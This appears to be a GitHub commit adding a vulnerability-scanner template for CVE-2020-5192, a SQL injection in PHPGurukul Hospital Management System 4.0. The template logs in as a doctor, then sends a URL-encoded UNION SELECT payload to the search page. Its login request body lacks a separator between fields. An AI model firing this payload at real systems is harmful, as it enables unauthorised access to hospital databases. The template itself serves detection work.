Create CVE-2020-5192.yaml

PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple SQL injection vulnerabilities: multiple pages and parameters are not validating user input, and allow for the application's database and information to be fully compromised.
patch-1
TenBird-1 2022-08-27 15:49:07 +09:00 committed by GitHub
parent bc21497f99
commit c3f0698e1d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 41 additions and 0 deletions

View File

@ -0,0 +1,41 @@
id: CVE-2020-5192
info:
name: Hospital Management System 4.0 - Persistent SQL Injection
author: TenBird
severity: High
description: PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple SQL injection vulnerabilities: multiple pages and parameters are not validating user input, and allow for the application's database and information to be fully compromised.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-5192
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2020-5192
cwe-id: CWE-89
tags: cve,cve2020,HMS,SQLi
requests:
- raw:
- |
POST /hospital/hms/doctor/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}password={{password}}&submit=&submit=
- |
POST /hospital/hms/doctor/search.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
searchdata=%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%28CONCAT%28%27qvxbq%27%2C%27zIuFTDXhtLrbZmAXQXxIalrRpZgCjsPnduKboFfW%27%29%2C%27qpqjq%27%29%2CNULL--+PqeG&search=
redirects: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'qvxbqzIuFTDXhtLrbZmAXQXxIalrRpZgCjsPnduKboFfWqpqjq'